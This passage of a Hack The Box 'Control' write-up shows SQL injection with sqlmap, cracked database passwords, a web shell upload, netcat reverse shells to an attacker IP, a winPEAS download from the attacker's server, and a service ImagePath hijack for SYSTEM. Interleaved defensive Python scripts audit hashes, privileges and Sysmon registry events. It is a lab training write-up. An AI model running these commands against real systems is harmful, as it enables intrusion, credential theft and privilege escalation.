[09:54:04] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[09:54:05] [INFO] using hash method 'mysql_passwd'
[09:54:05] [INFO] resuming password 'l3tm3!n' for hash '*cfe3eee434b38cbf709ad67a4dcdea476cba7fda'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[09:54:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[09:54:06] [INFO] starting dictionary-based cracking (mysql_passwd)
[09:54:06] [INFO] starting 4 processes 
[09:54:07] [INFO] current status: 212  ... /
Database: mysql
Table: user
[6 entries]
+---------+-----------------------------------------------------+
| user    | Password                                            |
+---------+-----------------------------------------------------+
| hector  | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D           |
| manager | *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA (l3tm3!n) |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
+---------+-----------------------------------------------------+

[09:54:14] [INFO] table 'mysql.`user`' dumped to CSV file '/home/johnd/.sqlmap/output/10.10.10.167/dump/mysql/user.csv'
[09:54:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[09:54:14] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 09:54:14 /2020-03-05/

Reviewing the output we can see that sqlmap's dictionary attack cracked the password for the manager account: l3tm3!n. Checking the remaining hashes on CrackStation.net gives the plaintext l33th4x0rhector for the account belonging to hector.
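The cracking step succeeds so cheaply because mysql_native_password hashes are an unsalted double SHA-1 of the password: identical passwords give identical hashes (compare the four root rows above), and one dictionary pass covers every account at once. The following Python snippet is an added example and not part of the original write-up: it parses the sqlmap dump table shown above, recomputes the hash format for a candidate password, and flags accounts that share a hash or still use the legacy format. The DUMP text is copied from the output above; nothing else in the snippet comes from the box.

```python
"""Added example: auditing a mysql.user dump like the one above.

parse_sqlmap_table() reads sqlmap's ASCII table, mysql_native_password()
recomputes the hash format used on the box, and audit() reports the
weaknesses that made the cracking step cheap.  DUMP is copied from the
write-up's output; nothing else here comes from the box."""
import hashlib

DUMP = """\
+---------+-----------------------------------------------------+
| user    | Password                                            |
+---------+-----------------------------------------------------+
| hector  | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D           |
| manager | *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA (l3tm3!n) |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8           |
+---------+-----------------------------------------------------+
"""


def parse_sqlmap_table(text: str) -> list:
    """Return one dict per data row; the first '|' line is the header."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # border lines (+---+) carry no data
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def mysql_native_password(password: str) -> str:
    """PASSWORD() / mysql_native_password since MySQL 4.1:
    '*' + upper-case hex of SHA1(SHA1(password)).  No salt, no work factor."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def is_native_hash(value: str) -> bool:
    return (len(value) == 41 and value[0] == "*"
            and all(c in "0123456789ABCDEF" for c in value[1:].upper()))


def verify_password(stored_hash: str, candidate: str) -> bool:
    """Check one candidate against a stored hash (case-insensitive hex)."""
    return mysql_native_password(candidate) == stored_hash.upper()


def audit(rows: list) -> dict:
    """Flag legacy-format hashes and hashes shared between rows.  A shared
    hash means a shared password, visible without cracking anything."""
    by_hash = {}
    legacy = set()
    for r in rows:
        stored = r["Password"].split()[0]  # drop sqlmap's "(cracked)" suffix
        by_hash.setdefault(stored, []).append(r["user"])
        if is_native_hash(stored):
            legacy.add(r["user"])
    shared = [users for users in by_hash.values() if len(users) > 1]
    return {"legacy_hash_accounts": sorted(legacy), "shared_hash_groups": shared}


if __name__ == "__main__":
    rows = parse_sqlmap_table(DUMP)
    print(audit(rows))
    manager_hash = rows[1]["Password"].split()[0]
    print(verify_password(manager_hash, "l3tm3!n"))  # True
```

The practical fix on the database side is to move accounts off mysql_native_password (MariaDB's ed25519 plugin or MySQL's caching_sha2_password), give each root host entry its own credential, and keep the application account away from the mysql schema entirely so a SQL injection cannot read it.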

Finally we check which database user the application connects as, and what privileges each account holds:

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --current-user --privileges

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:10:05 /2020-03-05/

[10:10:05] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:10:05] [INFO] resuming back-end DBMS 'mysql' 
[10:10:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:10:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:10:05] [INFO] fetching current user
current user: 'manager@localhost' <-------------------------------
[10:10:05] [INFO] fetching database users privileges
database management system users privileges:
[*] 'hector'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'manager'@'localhost' [1]:
    privilege: FILE            <-------------------------------
[*] 'root'@'127.0.0.1' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'fidelity' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DELETE HISTORY
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

[10:10:05] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 10:10:05 /2020-03-05/

johnd@kali:~/Hack The Box/Control$ 

Checking the current user (manager) and their associated privileges, it can be seen that the user has the FILE privilege, which means we have the ability to read and write files on the server using LOAD_FILE() for reading and INTO OUTFILE for writing. To validate this we perform a simple LOAD_FILE query to read a file off the server like so:

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --sql-query "SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts');"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:13:55 /2020-03-05/

[10:13:55] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:13:55] [INFO] resuming back-end DBMS 'mysql' 
[10:13:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:13:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:13:58] [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts')'
SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts'): '# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n#\r\n# This file contains the mappings of IP addresses to host names. Each\r\n# entry should be kept on an individual line. The IP address should\r\n# be placed in the first column followed by the corresponding host name.\r\n# The IP address and the host name should be separated by at least one\r\n# space.\r\n#\r\n# Additionally, comments (such as these) may be inserted on individual\r\n# lines or following the machine name denoted by a '#' symbol.\r\n#\r\n# For example:\r\n#\r\n#      102.54.94.97     rhino.acme.com          # source server\r\n#       38.25.63.10     x.acme.com              # x client host\r\n\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1       localhost\r\n#\t::1             localhost\r\n'
[10:13:59] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
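From the defender's side, the finding in the listing above is not that root holds FILE (root holds everything) but that a plain application account does. The script below is an added example, not part of the writeup or of sqlmap: it parses a constructed sample in the same format as sqlmap's privileges listing, separates administrator accounts from ordinary ones, flags any ordinary account holding a global privilege that reaches the file system or the server process, and emits the matching REVOKE statements. The sample accounts (hector, manager, webapp) and their privileges are invented to mirror the output above.

```python
import re
from typing import Dict, List, Set

# Constructed sample in the format sqlmap prints for --privileges
# (mirrors the listing above; trimmed, not a capture from the target).
SAMPLE_SQLMAP_PRIVS = """\
database management system users privileges:
[*] 'hector'@'localhost' (administrator) [29]:
    privilege: ALTER
    privilege: FILE
    privilege: SUPER
[*] 'manager'@'localhost' [1]:
    privilege: FILE
[*] 'webapp'@'%' [2]:
    privilege: SELECT
    privilege: INSERT
"""

ACCOUNT_RE = re.compile(
    r"^\[\*\] '(?P<user>[^']+)'@'(?P<host>[^']+)'(?P<admin> \(administrator\))? \[\d+\]:\s*$"
)
PRIV_RE = re.compile(r"^\s+privilege: (?P<priv>\S.*?)\s*$")

# Global privileges that reach the file system or the server process.
# An application account should hold none of them.
DANGEROUS: Set[str] = {"FILE", "SUPER", "PROCESS", "SHUTDOWN", "CREATE USER"}


def parse_privileges(text: str) -> Dict[str, dict]:
    """Parse sqlmap's listing into {"user@host": {"admin": bool, "privs": set}}."""
    accounts: Dict[str, dict] = {}
    current = None
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line)
        if m:
            current = f"{m['user']}@{m['host']}"
            accounts[current] = {"admin": bool(m["admin"]), "privs": set()}
            continue
        m = PRIV_RE.match(line)
        if m and current is not None:
            accounts[current]["privs"].add(m["priv"])
    return accounts


def risky_accounts(accounts: Dict[str, dict]) -> Dict[str, List[str]]:
    """Non-administrator accounts holding any dangerous global privilege."""
    findings: Dict[str, List[str]] = {}
    for name, info in accounts.items():
        if info["admin"]:
            continue  # root-style accounts are expected to hold everything
        hits = sorted(info["privs"] & DANGEROUS)
        if hits:
            findings[name] = hits
    return findings


def revoke_statements(findings: Dict[str, List[str]]) -> List[str]:
    """Remediation: these are global privileges, so they are revoked ON *.*."""
    stmts = []
    for name, privs in findings.items():
        user, host = name.rsplit("@", 1)
        stmts.append(f"REVOKE {', '.join(privs)} ON *.* FROM '{user}'@'{host}';")
    return stmts


if __name__ == "__main__":
    found = risky_accounts(parse_privileges(SAMPLE_SQLMAP_PRIVS))
    for account, privs in found.items():
        print(f"{account}: {', '.join(privs)}")
    for stmt in revoke_statements(found):
        print(stmt)
```

Revoking FILE closes LOAD_FILE and INTO OUTFILE for that account; the server-side control that backs it up is secure_file_priv in my.ini, which should name a dedicated directory (or be NULL to disable file import and export entirely) rather than be left empty, since an empty value places no restriction on where the server may read or write.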

6.1 Arbitrary File Upload

Our next step is to upload a PHP web shell that will allow us to execute commands on the remote system.

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --file-write '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' --file-dest 'C:/inetpub/wwwroot/undergrad.php'
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:20:55 /2020-03-05/

[10:20:55] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:20:55] [INFO] resuming back-end DBMS 'mysql' 
[10:20:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:20:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:20:56] [INFO] fingerprinting the back-end DBMS operating system
[10:20:56] [INFO] the back-end DBMS operating system is Windows
[10:20:57] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)                                                                                                             
[10:21:01] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
do you want confirmation that the local file '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/undergrad.php')? [Y/n] 
[10:21:03] [INFO] the local file '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' and the remote file 'C:/inetpub/wwwroot/undergrad.php' have the same size (1770 B)
[10:21:03] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 10:21:03 /2020-03-05/

Navigating to http://10.10.10.167/undergrad.php we can see that our reverse shell uploaded successfully.

7. Getting User Flag

Next we upload the netcat executable in order to get a reverse shell.

sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --file-write '/usr/share/windows-resources/binaries/nc.exe' --file-dest 'C:/inetpub/wwwroot/undergrad.exe'
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:26:18 /2020-03-05/

[10:26:18] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:26:18] [INFO] resuming back-end DBMS 'mysql' 
[10:26:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productId=32;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:26:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:26:18] [INFO] fingerprinting the back-end DBMS operating system
[10:26:18] [INFO] the back-end DBMS operating system is Windows
[10:26:58] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                                                                            

[10:27:38] [INFO] the local file '/usr/share/windows-resources/binaries/nc.exe' and the remote file 'C:/inetpub/wwwroot/undergrad.exe' have the same size (59392 B)

[10:27:38] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'

[*] ending @ 10:27:38 /2020-03-05/

Going back to our webshell we execute the following command:

undergrad.exe -e powershell.exe 10.10.15.5 4444

As can be seen in Figure 19, we have successfully executed a reverse shell and are operating as the user nt authority\iusr, which is a built-in user for Microsoft IIS. Checking user accounts (Figure 19) we can see an account belonging to Hector. Having already cracked Hector's password earlier, we can escalate our privileges to this user using PowerShell by creating a PSCredential object and passing the -Credential flag to Invoke-Command.

Setting up the object:

$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("Fidelity\Hector", $pass)

Next create another Netcat listener on a different port on the attacker machine.

We can now use Invoke-Command to execute our reverse shell.

Invoke-Command -Computer Fidelity -Credential $cred -ScriptBlock { cmd.exe "/c C:\inetpub\wwwroot\undergrad.exe -e powershell.exe 10.10.15.5 5555" }

8. Privilege Escalation

Checking the user's permissions and groups doesn't reveal much. Next we can upload some Windows privilege escalation scripts to help find potential attack vectors.

We can use Python's simple HTTP server module to host the files on our attacker machine and then use PowerShell to retrieve them:

Invoke-WebRequest http://10.10.15.58:8000/winPEAS.exe -OutFile C:\Users\Hector\Documents\winPeas.exe

None of these scripts revealed much. The next step was to check which services Hector has control over. We can discover this by running this ugly PowerShell one-liner, which lists the ACL of every service's registry key and keeps the lines naming the key path and any entries for Hector or the Users group:

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"

9. Getting Root.txt

9.1 Trusted Service Paths

We can abuse more or less any of these services (in this case wuauserv) to execute a netcat shell with administrator privileges. To do this we first check the current ImagePath.

Next we modify the ImagePath to execute a netcat shell (undergrad.exe, which we uploaded in Section 7):

reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\undergrad.exe 10.10.15.174 6666 -e cmd.exe" /f

Next we set up our listener.

Finally we start the service with sc.exe start wuauserv, and we should receive a reverse shell that allows us to retrieve the root.txt flag.
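The weakness behind Sections 8 and 9 is a service registry key whose ACL lets a non-administrator rewrite ImagePath; the one-liner in Section 8 audits for that, and the same event is what a defender watches for in telemetry. The script below is an added example, not from the writeup, that runs that check over constructed Sysmon Event ID 13 (RegistryEvent, value set) records: it picks out writes to any service's ImagePath and alerts when the new binary sits outside the normal install roots or inside a user- or web-writable directory. The JSON field names follow Sysmon's RegistryEvent schema; the five sample events, the VendorSvc service and the file paths other than those already on this page are invented.

```python
import json
import re
from typing import Dict, List, Optional

# Constructed Sysmon Event ID 13 records, one JSON object per line as a SIEM
# would forward them. Sample telemetry mirroring the steps above, not from the box.
SAMPLE_EVENTS = r"""
{"EventID": 13, "Image": "C:\\Windows\\servicing\\TrustedInstaller.exe", "User": "NT AUTHORITY\\SYSTEM", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\wuauserv\\ImagePath", "Details": "%SystemRoot%\\system32\\svchost.exe -k netsvcs -p"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe", "User": "FIDELITY\\Hector", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\wuauserv\\ImagePath", "Details": "C:\\inetpub\\wwwroot\\undergrad.exe 10.10.15.174 6666 -e cmd.exe"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "FIDELITY\\Hector", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\wuauserv\\Start", "Details": "DWORD (0x00000003)"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\msiexec.exe", "User": "NT AUTHORITY\\SYSTEM", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorSvc\\ImagePath", "Details": "\"C:\\Program Files\\Vendor\\svc.exe\" --service"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\sc.exe", "User": "FIDELITY\\Hector", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VendorSvc\\ImagePath", "Details": "C:\\Users\\Public\\svc.exe"}
"""

# Sysmon renders the hive as HKLM\System\...; match both the live control set
# and the numbered ones.
SERVICE_IMAGEPATH_RE = re.compile(
    r"^HKLM\\System\\(?:CurrentControlSet|ControlSet\d+)\\Services\\(?P<svc>[^\\]+)\\ImagePath$",
    re.I,
)
# First .exe in the value, whether or not the path is quoted or carries arguments.
EXE_RE = re.compile(r'^"?(?P<exe>.+?\.exe)', re.I)

# Where service binaries legitimately live on a default install
# ("c:\program files" also covers "c:\program files (x86)").
TRUSTED_ROOTS = (
    "c:\\windows\\system32",
    "c:\\windows\\syswow64",
    "c:\\windows\\servicing",
    "c:\\program files",
)
# Locations a low-privileged user or a web application can write to.
WRITABLE_HINTS = ("c:\\inetpub", "c:\\users", "\\temp\\", "\\appdata\\")


def executable_from_imagepath(value: str) -> str:
    """Extract the executable from an ImagePath value, expanding %SystemRoot%."""
    expanded = re.sub(r"%systemroot%|%windir%", r"C:\\Windows", value, flags=re.I)
    m = EXE_RE.match(expanded)
    exe = m["exe"] if m else expanded.strip().split(" ")[0]
    return exe.strip('"').lower()


def classify(event: dict) -> Optional[Dict]:
    """Return a finding for a suspicious service ImagePath write, else None."""
    if event.get("EventID") != 13:
        return None
    m = SERVICE_IMAGEPATH_RE.match(event.get("TargetObject", ""))
    if not m:
        return None  # some other service value (Start, DisplayName, ...)
    exe = executable_from_imagepath(event.get("Details", ""))
    reasons = []
    if not exe.startswith(TRUSTED_ROOTS):
        reasons.append("image outside trusted install roots")
    if any(hint in exe for hint in WRITABLE_HINTS):
        reasons.append("image in user- or web-writable location")
    if not reasons:
        return None
    return {"service": m["svc"], "image": exe, "process": event.get("Image"),
            "user": event.get("User"), "reasons": reasons}


def scan(jsonl: str) -> List[Dict]:
    """Run classify() over newline-delimited JSON events and collect findings."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = classify(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {f['service']}: ImagePath -> {f['image']} set by {f['user']} "
              f"via {f['process']} ({'; '.join(f['reasons'])})")
```

Run against the sample, the TrustedInstaller and msiexec writes pass and the two writes by Hector alert. An alert only tells you after the fact; the preventive fix is the ACL the Section 8 one-liner inspects: only SYSTEM, Administrators and TrustedInstaller should be able to set values under a service's key, and once that holds, an ImagePath change by reg.exe, sc.exe or PowerShell running as an interactive user is rare enough on a domain controller to be worth paging on.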
